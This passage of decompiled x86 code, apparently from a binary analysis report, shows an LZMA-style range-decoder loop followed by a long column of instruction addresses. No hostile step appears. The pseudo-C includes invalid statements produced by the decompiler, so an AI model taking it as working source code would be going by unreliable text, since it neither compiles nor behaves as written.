												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                          0x00000000
                          0x004066f0
                          0x004066f0
                          0x004066f4
                          0x00406701
                          0x0040670b
                          0x00000000
                          0x004066f6
                          0x004066f6
                          0x00406731
                          0x00406734
                          0x00406737
                          0x0040673a
                          0x0040673a
                          0x0040673d
                          0x00406744
                          0x00406749
                          0x0040662a
                          0x0040662d
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x004069a2
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00406bb9
                          0x00406bc1
                          0x00406bc8
                          0x00406bca
                          0x00406bd1
                          0x00406bd5
                          0x00406bd5
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a12
                          0x00406a15
                          0x00406a15
                          0x00406a1b
                          0x00406a1b
                          0x004061b7
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00000000
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x00406230
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
                          0x00406303
                          0x00406306
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406333
                          0x00406335
                          0x00406338
                          0x004063a9
                          0x004063ac
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040699f
                          0x0040633a
                          0x0040633e
                          0x00406341
                          0x00406343
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635b
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406370
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406380
                          0x00406383
                          0x004063a1
                          0x004063a3
                          0x00000000
                          0x00406385
                          0x00406385
                          0x00406388
                          0x0040638b
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00000000
                          0x0040639c
                          0x00000000
                          0x004065d2
                          0x004065d6
                          0x004065f4
                          0x004065f7
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x00406607
                          0x0040660a
                          0x0040660d
                          0x0040660f
                          0x00406616
                          0x00406617
                          0x00406619
                          0x0040661c
                          0x0040661f
                          0x00406622
                          0x00406622
                          0x00406627
                          0x00000000
                          0x00406627
                          0x004065d8
                          0x004065db
                          0x004065de
                          0x004065e8
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x00000000
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x00000000
                          0x0040667f
                          0x00406683
                          0x00000000
                          0x00000000
                          0x00406689
                          0x0040668d
                          0x00000000
                          0x00000000
                          0x00406693
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x004063cc
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00000000
                          0x00406b3d
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x004063f1
                          0x004063f1
                          0x004063f4
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x004063fd
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406434
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406467
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406470
                          0x00406477
                          0x0040647a
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406485
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064aa
                          0x004064aa
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064cd
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064f8
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x004064fd
                          0x00406504
                          0x00406507
                          0x00000000
                          0x00406509
                          0x00000000
                          0x00406509
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00000000
                          0x00000000
                          0x00406549
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x0040656e
                          0x0040656e
                          0x00406574
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00406515
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406591
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065bc
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c1
                          0x004065c8
                          0x004065cb
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406867
                          0x0040686a
